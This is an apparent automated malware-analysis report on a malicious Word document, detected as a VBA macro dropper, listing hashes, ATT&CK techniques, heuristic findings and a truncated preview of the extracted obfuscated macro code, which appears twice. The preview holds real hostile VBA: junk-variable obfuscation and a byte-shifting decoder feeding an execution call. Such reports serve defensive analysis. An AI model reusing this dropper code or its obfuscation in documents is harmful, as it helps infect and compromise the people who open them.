Office (OLE) malware analysis — malicious · 4de77bbfd848a3d8

MALICIOUS

Office (OLE)

181.5 KB Created: 2017-12-05 15:14:00 Authoring application: Microsoft Office Word First seen: 2017-12-09

MD5: 2853470c8acf318d7022b24af9142400 SHA-1: 2e5d55bb2aef42a928c9d6b7573a8c3527b0cb02 SHA-256: 4de77bbfd848a3d8f858994d817c4b6f9a40638316cacc4768e9cff892017997

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6391453-0'. It contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initial execution. The obfuscated nature of the VBA code suggests it is intended to download and run a further stage, typical of a dropper malware.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6391453-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6391453-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 40809 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	40809 bytes
SHA-256: `65bd945689a909d7c4432380bb8ffa6d376c5ac0fbe876e6add677ddc1090dc5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub sublimi() Dim disguisement As Variant Dim daily As Byte cystoplegia.vasoconstriction.Value = Day(#12/5/2013#) varday = fanaloka = "sled" calculated = "allowances" lodging = "millerite" logy = sawyer accidentally = "skagit" vacuous = "acromyotonia" eke = "glyster" madwoman = fastening Set barelegged = cystoplegia.vasoconstriction.SelectedItem those = 37 + 58 Pmt 0, those, 7669, 34596, 4 undeviating = barelegged.Name disregarding = 91 - 6 + 7759 estuary = Right(undeviating, disregarding) elaeis = hygrocybe(estuary) econometrician = 2 + 16 Pmt 0, econometrician, 39088, 41223, 7 nineteen = "cookout" #If (21 - 2 + 381 + 116 - 121 + 305) > ((38 - 77 + 359) - (7 - 72 + 605) * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim caroling As Byte Dim mounts As Long Dim cutcherry As Byte Dim unkindness As Long Dim crupper As Long authoritatively = 43 - 23 + 761 Dim hyetography As Long Dim oriental As Long adoptable = authoritatively + 3459 #ElseIf (21 - 2 + 381 + 116 - 121 + 305) > ((38 - 77 + 359) - (7 - 72 + 605) * 1) And (21 - 7 * 3) * 2 < (Win64) Then Dim fewness As Variant Dim unkindness As LongPtr Dim mounts As LongPtr Dim linelike As Variant Dim affable As Integer Dim crupper As LongPtr Dim hyetography As LongPtr Dim oriental As LongPtr adoptable = 115 - 105 + 2054 #End If merino = 126 - 125 - 1 orange = "champak" phantom = "disquisition" nt = 92 - 70 + 4074 biconvex = 38 + 30 Pmt 0, biconvex, 7814, 15957, 6 psittaciformes = "disproportion" nobleness = "stolidity" comprador = sweating outstroke = sante modue = 7 + 57 Pmt 0, modue, 16353, 22028, 6 brine = elaeis ovum = arrack unkindness = misgovernment(brine) alphanumeric = "facilitate" misinformaton = "acidimetric" Dim enjoyableness As Integer Dim facultative As Long crupper = 1 - 81 + 80 mounts = unkindness + adoptable hyetography = 61 - 11 + 201477 oriental = 29 - 38 + 3509 iccusion = calisaya(hyetography, _ crupper, mounts, _ crupper, crupper, _ crupper, crupper) formation = 52 + 10 Pmt 0, formation, 27781, 26134, 8 End Sub Function hygrocybe(dig) As String Dim inani() As Byte Dim continence(6962) As Byte Dim disloyally(63) As Long Dim anarchist As Long Dim fluorescent As Long Dim cogent(63) As Long Dim afflicting(63) As Long Dim seppuku As String Dim bin As Long labors = Rnd(190) Dim nuke As Long phonologist = 78 - 23 + 200 mouthwatering = 68 - 9 + 197 fleurs = 32 - 15 + 65263 nourish = 72 - 123 + 262195 nepa = 25 - 99 + 16711754 friendliness = 24 - 51 + 91 Dim eurodollar As Variant flow = 70 - 97 + 16515099 parfait = 69 - 71 + 4034 Dim helmholtz As Long aberdeen = 88 - 126 + 101 miscarry = 93 - 108 + 4111 guiser = 89 - 35 + 65482 Dim killick As Byte pomposity = 67 - 33 + 258014 Dim ressort As String biotechnology = 19 - 20 + 7844 Dim advantaged() As Byte advantaged = VBA.StrConv(dig, 120 + 8) cardiomegaly = 60 + 45 Pmt 0, cardiomegaly, 4228, 39996, 3 abstruse = 7843 neurotrichus = vbKeyShift - 12 For pelycosaur = 0 To abstruse If pelycosaur Mod 2 = 0 Then advantaged(pelycosaur) = advantaged(pelycosaur) - neurotrichus Else advantaged(pelycosaur) = advantaged(pelycosaur) - (neurotrichus - 1) End If Next pelycosaur comprendre = 39 + 23 Pmt 0, comprendre, 13943, 40155, 3 matronage = doublecrosser For fluorescent = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) disloyally(fluorescent) = peaks(fluorescent, friendliness, 41) afflicting(fluorescent) = peaks(fluorescent, miscarry, 41) cogent(fluorescent) = peaks(fluorescent, nourish, 41) Next fluorescent pitiless = 29 + 21 Pmt 0, pitiless, 18685, 26052, 6 inani = advantaged ble = 3 - 83 + 84 citrulline = 20 + 59 Pmt 0, citrulline, 16340, 37518, 3 adaptability = 8 - 108 + 103 labors = flotat ... (truncated)

SHA-256: 65bd945689a909d7c4432380bb8ffa6d376c5ac0fbe876e6add677ddc1090dc5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub sublimi()
Dim disguisement As Variant
Dim daily As Byte
cystoplegia.vasoconstriction.Value = Day(#12/5/2013#)
varday = fanaloka = "sled"
calculated = "allowances"
lodging = "millerite"
logy = sawyer
accidentally = "skagit"

vacuous = "acromyotonia"
eke = "glyster"
madwoman = fastening
Set barelegged = cystoplegia.vasoconstriction.SelectedItem
those = 37 + 58
 Pmt 0, those, 7669, 34596, 4

undeviating = barelegged.Name
disregarding = 91 - 6 + 7759
estuary = Right(undeviating, disregarding)
elaeis = hygrocybe(estuary)
econometrician = 2 + 16
 Pmt 0, econometrician, 39088, 41223, 7

nineteen = "cookout"
#If (21 - 2 + 381 + 116 - 121 + 305) > ((38 - 77 + 359) - (7 - 72 + 605) * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim caroling As Byte
Dim mounts As Long
Dim cutcherry As Byte
Dim unkindness As Long
Dim crupper As Long
authoritatively = 43 - 23 + 761
Dim hyetography As Long
Dim oriental As Long
adoptable = authoritatively + 3459
#ElseIf (21 - 2 + 381 + 116 - 121 + 305) > ((38 - 77 + 359) - (7 - 72 + 605) * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim fewness As Variant
Dim unkindness As LongPtr
Dim mounts As LongPtr
Dim linelike As Variant
Dim affable As Integer
Dim crupper As LongPtr
Dim hyetography As LongPtr
Dim oriental As LongPtr
adoptable = 115 - 105 + 2054
#End If
merino = 126 - 125 - 1
orange = "champak"
phantom = "disquisition"
nt = 92 - 70 + 4074
biconvex = 38 + 30
 Pmt 0, biconvex, 7814, 15957, 6

psittaciformes = "disproportion"
nobleness = "stolidity"
comprador = sweating
outstroke = sante
modue = 7 + 57
 Pmt 0, modue, 16353, 22028, 6

brine = elaeis
ovum = arrack
unkindness = misgovernment(brine)
alphanumeric = "facilitate"
misinformaton = "acidimetric"
Dim enjoyableness As Integer
Dim facultative As Long
crupper = 1 - 81 + 80
mounts = unkindness + adoptable
hyetography = 61 - 11 + 201477
oriental = 29 - 38 + 3509
iccusion = calisaya(hyetography, _
crupper, mounts, _
crupper, crupper, _
crupper, crupper)
formation = 52 + 10
 Pmt 0, formation, 27781, 26134, 8

End Sub

Function hygrocybe(dig) As String
Dim inani() As Byte
Dim continence(6962) As Byte
Dim disloyally(63) As Long
Dim anarchist As Long
Dim fluorescent As Long
Dim cogent(63) As Long
Dim afflicting(63) As Long
Dim seppuku As String
Dim bin As Long
labors = Rnd(190)

Dim nuke As Long
phonologist = 78 - 23 + 200
mouthwatering = 68 - 9 + 197
fleurs = 32 - 15 + 65263
nourish = 72 - 123 + 262195
nepa = 25 - 99 + 16711754
friendliness = 24 - 51 + 91
Dim eurodollar As Variant

flow = 70 - 97 + 16515099
parfait = 69 - 71 + 4034
Dim helmholtz As Long

aberdeen = 88 - 126 + 101
miscarry = 93 - 108 + 4111
guiser = 89 - 35 + 65482
Dim killick As Byte

pomposity = 67 - 33 + 258014
Dim ressort As String
biotechnology = 19 - 20 + 7844
Dim advantaged() As Byte
advantaged = VBA.StrConv(dig, 120 + 8)
cardiomegaly = 60 + 45
 Pmt 0, cardiomegaly, 4228, 39996, 3

abstruse = 7843
neurotrichus = vbKeyShift - 12
For pelycosaur = 0 To abstruse
If pelycosaur Mod 2 = 0 Then
advantaged(pelycosaur) = advantaged(pelycosaur) - neurotrichus
Else
advantaged(pelycosaur) = advantaged(pelycosaur) - (neurotrichus - 1)
End If
Next pelycosaur
comprendre = 39 + 23
Pmt 0, comprendre, 13943, 40155, 3
matronage = doublecrosser
For fluorescent = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
disloyally(fluorescent) = peaks(fluorescent, friendliness, 41)
afflicting(fluorescent) = peaks(fluorescent, miscarry, 41)
cogent(fluorescent) = peaks(fluorescent, nourish, 41)
Next fluorescent
pitiless = 29 + 21
 Pmt 0, pitiless, 18685, 26052, 6

inani = advantaged
ble = 3 - 83 + 84
citrulline = 20 + 59
 Pmt 0, citrulline, 16340, 37518, 3

adaptability = 8 - 108 + 103
labors = flotat
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.